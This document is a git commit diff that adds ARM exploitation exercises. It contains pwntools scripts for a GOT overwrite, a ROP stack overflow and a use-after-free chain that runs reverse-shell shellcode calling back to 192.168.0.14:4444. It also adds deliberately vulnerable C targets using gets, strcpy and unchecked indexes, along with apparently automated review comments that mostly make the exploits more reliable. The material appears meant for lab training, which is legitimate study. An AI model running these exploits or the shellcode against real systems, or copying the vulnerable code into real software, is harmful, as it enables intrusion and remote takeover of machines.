Commit
1 parent
c4f28df
commit aa14be8
Showing
8 changed files
with
658 additions
and
0 deletions.
@@ -0,0 +1,55 @@ | ||
#!/usr/bin/env python2 | ||
|
||
from pwn import * | ||
|
||
ip = "192.168.0.13" | ||
port = 22 | ||
user = "pi" | ||
pwd = "toSet" | ||
|
||
libc = ELF('libc-2.24.so') | ||
gadget_offset = 0xed748 | ||
|
||
shell = ssh(user, ip, password=pwd, port=port) | ||
|
||
sh = shell.run('/home/pi/arm/episode3/got_overw') | ||
|
||
# fill the array | ||
sh.recvuntil('array:\n') | ||
sh.sendline('1852400175') # "nib/" | ||
sh.sendline('6845231') # "hs/" | ||
for i in range(0,10): | ||
sh.sendline(str(i)) | ||
|
||
sh.recvuntil('read: \n') | ||
|
||
# Leak the libc address | ||
sh.sendline('-9') # offset to the libc in the GOT section | ||
ret = sh.recvline().split() | ||
libc_main = int(ret[6]) | ||
# libc_base = libc_main - libc_base_offset | ||
libc_base = libc_main - libc.symbols['__libc_start_main'] | ||
log.info('libcbase: %#x' % libc_base) | ||
# address of the system function | ||
system_addr = libc_base + libc.symbols['system'] | ||
log.info('system address: %#x' % system_addr) | ||
|
||
sh.recvuntil('[y/n]\n') | ||
# do not read other values | ||
sh.sendline('n') | ||
|
||
sh.recvuntil('modify?\n') | ||
# send the system function address | ||
sh.sendline(str(system_addr)) | ||
sh.recvuntil('modify\n') | ||
sh.sendline('-10') # offset of the put in the GOT section | ||
sh.recvuntil('value\n') | ||
# gadget address | ||
gadget_address = libc_base + gadget_offset | ||
log.info('gadget address: %#x' % gadget_address) | ||
# send the gadget address | ||
sh.sendline(str(gadget_address)) | ||
|
||
sh.interactive() | ||
|
||
shell.close() |
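Review bot: The libc leak at `ret = sh.recvline().split()` / `libc_main = int(ret[6])` is consumed with no check that the target really printed the "At position … the value is …" line, so a changed prompt, a timeout or an unexpected token turns into an IndexError or a bogus base far from the real failure; guard it with something like `assert len(ret) == 7 and ret[0] == 'At', ret` before the subtraction. If this targets the got_overw.c in the same commit, the entry is printed with `%d`, so a GOT value at or above 0x80000000 comes back negative and would need `& 0xffffffff` before `libc.symbols['__libc_start_main']` is subtracted. The SSH password `pwd = "toSet"` is a committed literal; reading it with `os.environ['PI_PWD']` (with `import os`) keeps the credential out of the repository. `gadget_offset = 0xed748` is a hand-pasted offset for one libc-2.24 build while everything else is derived from `ELF('libc-2.24.so')`; resolving it from that object, or at least commenting which build and what the gadget does, keeps the two from drifting apart.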
@@ -0,0 +1,46 @@ | ||
#!/usr/bin/env python2 | ||
|
||
from pwn import * | ||
|
||
ip = "192.168.0.13" | ||
port = 22 | ||
user = "pi" | ||
pwd = "toSet" | ||
|
||
libc = ELF('libc-2.24.so') | ||
|
||
shell = ssh(user, ip, password=pwd, port=port) | ||
|
||
sh = shell.run('/home/pi/arm/episode3/stack_overflow') | ||
|
||
payload = "A"*64 | ||
payload += p32(0x1) # r0 - standard output | ||
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr | ||
payload += p32(0x2100c) # r1 - address of read | ||
payload += p32(0x4) # r2 - number of bytes to write | ||
payload += p32(0x104C8) # lr - address of write | ||
payload += p32(0x00) # not used | ||
payload += p32(0x10488) # jump to the read - 0x104d4 <main+36> pop {r11, pc} | ||
sh.sendline(payload) | ||
|
||
# get the read address | ||
read_address = u32(sh.recv(4)) | ||
log.info('address of the read: %#x' % read_address) | ||
# get the libc_base address | ||
libc_base_address = read_address - libc.symbols['read'] | ||
# get the system address | ||
system_address = libc_base_address + libc.symbols['system'] | ||
log.info('address of the system: %#x' % system_address) | ||
shell_address = libc_base_address + next(libc.search("/bin/sh")) | ||
|
||
payload = "A"*64 | ||
payload += p32(shell_address) # r0 - /bin/sh address | ||
payload += p32(0x1046C) # rop gadget pop {r0, r1, r2, lr}; bx lr | ||
payload += p32(0x00) # r1 - not used | ||
payload += p32(0x00) # r2 - not used | ||
payload += p32(system_address) # lr - address of the system | ||
sh.sendline(payload) | ||
|
||
sh.interactive() | ||
|
||
shell.close() |
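Review bot: `read_address = u32(sh.recv(4))` assumes the four leaked bytes arrive in a single read; `recv` returns whatever happens to be buffered, so a short read makes `u32` raise on a 1–3 byte string, and a long one would be truncated silently. Use `read_address = u32(sh.recvn(4))`, which blocks until exactly four bytes are available. The chain hard-codes `0x1046C`, `0x2100c`, `0x104C8` and `0x10488` for what is presumably a non-PIE build; a comment recording where they came from (`# gadget/GOT/PLT addresses from objdump -d stack_overflow, this commit's build`) lets a reader re-derive them when the target is rebuilt. The password literal `pwd = "toSet"` belongs in the environment rather than the source, as in the sibling script.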
@@ -0,0 +1,132 @@ | ||
#!/usr/bin/env python2 | ||
from pwn import * | ||
import pwnlib.asm as asm | ||
import pwnlib.elf as elf | ||
|
||
ip = "192.168.0.13" | ||
port = 4444 | ||
|
||
PAGE_SIZE = 0x1000 | ||
|
||
def find_arm_gadget(e, gadget): | ||
gadget_bytes = asm.asm(gadget, arch='arm') | ||
gadget_address = None | ||
for address in e.search(gadget_bytes): | ||
if address % 4 == 0: | ||
gadget_address = address | ||
if gadget_bytes == e.read(gadget_address, len(gadget_bytes)): | ||
log.info(asm.disasm(gadget_bytes, vma=gadget_address, arch='arm')) | ||
break | ||
return gadget_address | ||
|
||
def find_thumb_gadget(e, gadget): | ||
gadget_bytes = asm.asm(gadget, arch='thumb') | ||
gadget_address = None | ||
for address in e.search(gadget_bytes): | ||
if address % 2 == 0: | ||
gadget_address = address + 1 | ||
if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)): | ||
log.info(asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb')) | ||
break | ||
return gadget_address | ||
|
||
def find_gadget(e, gadget): | ||
gadget_address = find_thumb_gadget(e, gadget) | ||
if gadget_address is not None: | ||
return gadget_address | ||
return find_arm_gadget(e, gadget) | ||
|
||
# libc file | ||
libc = ELF('libc-2.24.so') | ||
|
||
s = remote(ip, port) | ||
|
||
log.info('-----------------------------------------------') | ||
|
||
#####LEAK##### | ||
offset = 0x32df0c | ||
s.sendline('9') | ||
leak_value = s.recvuntil("area") | ||
# arbitrary read | ||
s.sendline('0x%08x.0x%08x.0x%08x') | ||
leak_values = s.recvuntil("done!") | ||
wel_msg = int(leak_values[76:84], 16) | ||
roulette_add = int(leak_values[109:114], 16) | ||
stack_address = int(leak_values[13:23], 16) | ||
|
||
log.info("The wel_msg address is: 0x%x", wel_msg) | ||
log.info("The roulette address is: 0x%x", roulette_add) | ||
log.info("The leak_address: 0x%x", stack_address) | ||
|
||
# libc base address | ||
libc_base = stack_address - offset | ||
log.info("Libc base address: 0x%x", libc_base) | ||
|
||
# mprotect address | ||
mprotect_address = libc_base + libc.symbols['mprotect'] | ||
log.info('mprotect address 0x%x' % mprotect_address) | ||
|
||
# gadget address | ||
libc.address = libc_base | ||
pop_r0_r1_r2_r3_r4_pc = find_gadget(libc, 'pop {r0, r1, r2, r3, r4, pc}') | ||
|
||
# insert note "AAAA" | ||
s.sendline('1') | ||
s.sendline('A'*4) | ||
# insert address of wel_msg as note | ||
s.sendline('1') | ||
s.sendline(p32(wel_msg)) | ||
# insert note "BBBB" | ||
s.sendline('1') | ||
s.sendline('B'*4) | ||
|
||
# reverse shell shellcode + "\x33" | ||
shellcode = "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0e\x1b\x01\x00\x00\x33" | ||
|
||
# len of the new stack | ||
stack_len = 40 | ||
stack = "" | ||
# set LR | ||
stack += p32(wel_msg + 36) #LR = address of the shellcode | ||
# gadget 2 - 76d6bb08: pop {r0, r1, r2, r3, r4, pc} | ||
stack += p32(pop_r0_r1_r2_r3_r4_pc) # thumb address | ||
# r0 = (wel_msg / PAGE_SIZE ) * PAGE_SIZE | ||
stack += p32((wel_msg / PAGE_SIZE) * PAGE_SIZE) | ||
# r1 = 0x100 | ||
stack += p32(0x100) | ||
# r2 = 0x7 | ||
stack += p32(0x07) #RWX | ||
# r3 = 0x00 | ||
stack += p32(0x00) | ||
# r4 = 0x00 | ||
stack += p32(0x00) | ||
# r5 = mprotect addres | ||
stack += p32(mprotect_address) | ||
stack += "ZZZZ" | ||
# change the wel_msg value | ||
s.sendline('0') | ||
s.sendline(stack + shellcode) | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
# objdump -d uaf | grep stack_pivot | ||
# 000111cc <_Z11stack_pivotv>: | ||
roulette_value = 0x111cc # address of the stack_pivot function | ||
# delete edit_obj | ||
s.sendline('4') | ||
s.sendline(str(roulette_value)) | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
# allocare the hole - set_address() | ||
s.sendline('5') | ||
s.sendline(str(roulette_add)) | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
# take control - show all note | ||
s.sendline('2') | ||
ret = s.recvuntil("message") | ||
sleep(1) | ||
|
||
s.close() |
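Review bot: The leak is parsed with fixed string slices (`leak_values[76:84]`, `[109:114]`, `[13:23]`), which silently produce wrong addresses the moment any printed field or banner changes width (the roulette slice takes only 5 hex digits, so a heap address of 6 digits is already cut); since the format string sent is `0x%08x.0x%08x.0x%08x`, match the fields instead with `fields = re.findall(r'0x([0-9a-fA-F]{8})', leak_values)` and index that list, failing loudly if fewer than three are found. The comment `# r5 = mprotect addres` on the last gadget slot is wrong: the gadget found is `pop {r0, r1, r2, r3, r4, pc}`, so that word lands in `pc` and is the call into mprotect — write `# pc = mprotect(r0 = page, r1 = 0x100, r2 = RWX)`, and drop the unused `stack_len = 40`. The shellcode comment should name the callback baked into the bytes: from the trailing literal (`\xc0\xa8\x00\x0e`) and the `mov r1, #0x5c` / `lsl #24` / `mov r5, #0x11` sequence it appears to connect back to 192.168.0.14:4444, which is not `ip`, and a reader will otherwise assume it dials the target. mprotect covers every page touched by `[addr, addr+len-1]`, so with `0x100` only the page containing `wel_msg` becomes RWX; if `wel_msg + 36` plus the ~165-byte shellcode crosses a page boundary the tail stays non-executable — passing `2 * PAGE_SIZE` as r1 removes that edge.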
@@ -0,0 +1,86 @@ | ||
#include <stdio.h> | ||
#include <math.h> | ||
|
||
#define MAX 12 | ||
#define PI 3.14159265 | ||
|
||
int main() | ||
{ | ||
static int arr[MAX]; | ||
char ch; | ||
int num, ret; | ||
int flag=1; | ||
unsigned int i, in_num, out_num, cos_param, write_index; | ||
|
||
printf("Please fill the array:\n"); | ||
|
||
for(i=0;i<MAX;i++){ | ||
if(scanf("%d", &in_num)==1){ | ||
arr[i]=in_num; | ||
} | ||
else{ | ||
printf("Please enter a number\n"); | ||
return 0; | ||
} | ||
} | ||
|
||
while(flag){ | ||
printf("Select the index of the element that you want to read: \n"); | ||
|
||
if(scanf("%d", &num)!=1){ | ||
printf("Please enter a number\n"); | ||
return 0; | ||
} | ||
|
||
printf("At position %d the value is %d\n", num, arr[num]); | ||
|
||
printf("Do you want read another number? [y/n]\n"); | ||
|
||
scanf(" %c", &ch); | ||
|
||
if(ch!='y'){ | ||
flag=0; | ||
} | ||
} | ||
|
||
printf("How many value do you want to modify?\n"); | ||
|
||
if(scanf("%d", &cos_param)!=1){ | ||
printf("Please enter a number:\n"); | ||
return 0; | ||
} | ||
//param 180 | ||
ret = cos(cos_param * PI /180.0); | ||
|
||
if (ret<0){ | ||
write_index = MAX; | ||
} | ||
else | ||
{ | ||
write_index = 1; | ||
} | ||
|
||
while(write_index){ | ||
if(flag!=0){ | ||
printf("Do you want to edit some value in the array? [y/n]\n"); | ||
scanf(" %c", &ch); | ||
} | ||
|
||
if(ch=='y' || flag==0){ | ||
printf("Select the index of the element that you want to modify\n"); | ||
scanf("%d", &num); | ||
|
||
printf("Enter the new value\n"); | ||
scanf("%d", &out_num); | ||
|
||
arr[num]=out_num; | ||
write_index--; | ||
flag=1; | ||
} | ||
else{ | ||
break; | ||
} | ||
} | ||
printf("Good done!\n"); | ||
return 0; | ||
} |
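Review bot: Nothing in the file says this is the deliberately vulnerable target for the `got_overw` exploit added in the same commit, so the unchecked index in `printf("At position %d the value is %d\n", num, arr[num]);` and `arr[num]=out_num;` read like ordinary bugs and invite a "fix" or a copy-paste; add a header such as `/* Training target: the index into arr[] is intentionally unchecked, so negative values reach the GOT. Do not reuse. */`. Separately, `in_num`, `cos_param` and `out_num` are `unsigned int` but read with `%d`; if the unsigned types are intended the format should be `%u` (or the variables `int`), and the `scanf` results at the modify prompts are unchecked, so a non-numeric answer silently reuses the previous `num` and `out_num`. The `//param 180` comment would carry its reasoning if written as `// cos() is truncated to int: ret is -1 only when cos() evaluates to exactly -1.0 (180 degrees and odd multiples), which unlocks MAX writes instead of 1`.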
@@ -0,0 +1,47 @@ | ||
#include <stdio.h> | ||
#include <string.h> | ||
|
||
char msgSecret[] = "This is the secret message"; | ||
char msgDefault[] = "This is the default message"; | ||
|
||
typedef struct _msg_struct | ||
{ | ||
char message[32]; | ||
int (*print_msg)(); | ||
}msg_struct; | ||
|
||
int print_secr() | ||
{ | ||
printf("Congrats! %s\n", msgSecret); | ||
return 0; | ||
} | ||
|
||
int print_default() | ||
{ | ||
printf("Hello! %s\n", msgDefault); | ||
return 0; | ||
} | ||
|
||
int main(int argc, char **argv) | ||
{ | ||
char message[80]; | ||
msg_struct p; | ||
|
||
printf("Please enter a message: \n"); | ||
|
||
gets(message); | ||
|
||
if(*message) | ||
{ | ||
p.print_msg=print_default; | ||
strcpy(p.message, message); | ||
p.print_msg(); | ||
} | ||
else | ||
{ | ||
printf("Insert the message!\n"); | ||
} | ||
|
||
return 0; | ||
} | ||
|
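Review bot: `msg_struct` declares `int (*print_msg)()` right after `char message[32]`, and `strcpy(p.message, message)` copies whatever `gets(message)` read into that 32-byte field before `p.print_msg()` is called, so the overwrite-then-call is presumably the intended lesson — but the file does not say so; add a header like `/* Training target: strcpy() from the unbounded gets() buffer into message[32] is meant to overwrite print_msg. Do not reuse. */`. `int (*print_msg)()` is an old-style non-prototype declaration that C23 removes; `int (*print_msg)(void)` means the same for these callees and still builds. `gets` was removed in C11, so the build flags (or a comment) should state which `-std=` the target is compiled with. `print_secr` is never referenced; a one-line comment saying it is the function the overwritten pointer should be redirected to tells the reader why it exists.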
@@ -0,0 +1,24 @@ | ||
#include <stdio.h> | ||
|
||
char pwdSecret[] = "stack123!"; | ||
|
||
void print_secr() | ||
{ | ||
printf("Password is %s\n", pwdSecret); | ||
} | ||
|
||
int main(int argc, char **argv) | ||
{ | ||
int check=0; | ||
char buffer[32]; | ||
|
||
gets(buffer); | ||
|
||
if(check == 0x74696445) { | ||
print_secr(); | ||
} | ||
else | ||
{ | ||
printf("No password to show\n"); | ||
} | ||
} |
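Review bot: `check` is initialised to 0 and never assigned, so `check == 0x74696445` (the bytes 45 64 69 74, "Edit" on a little-endian target) can only become true by overflowing `buffer[32]` through the unbounded `gets(buffer)` — the intended exercise, presumably, but nothing in the file says so; add `/* Training target: gets() overflow of buffer[32] must set check to 0x74696445 ("Edit"). Do not reuse. */` at the top. Whether `check` actually lies past the end of `buffer` on the stack is the compiler's choice, so the comment should also record the build flags (e.g. `-O0 -fno-stack-protector`) the exploit's padding was derived from. `pwdSecret` is a plain literal in the binary and recoverable with `strings`, which is fine for a CTF but worth stating so nobody mistakes the check for protection.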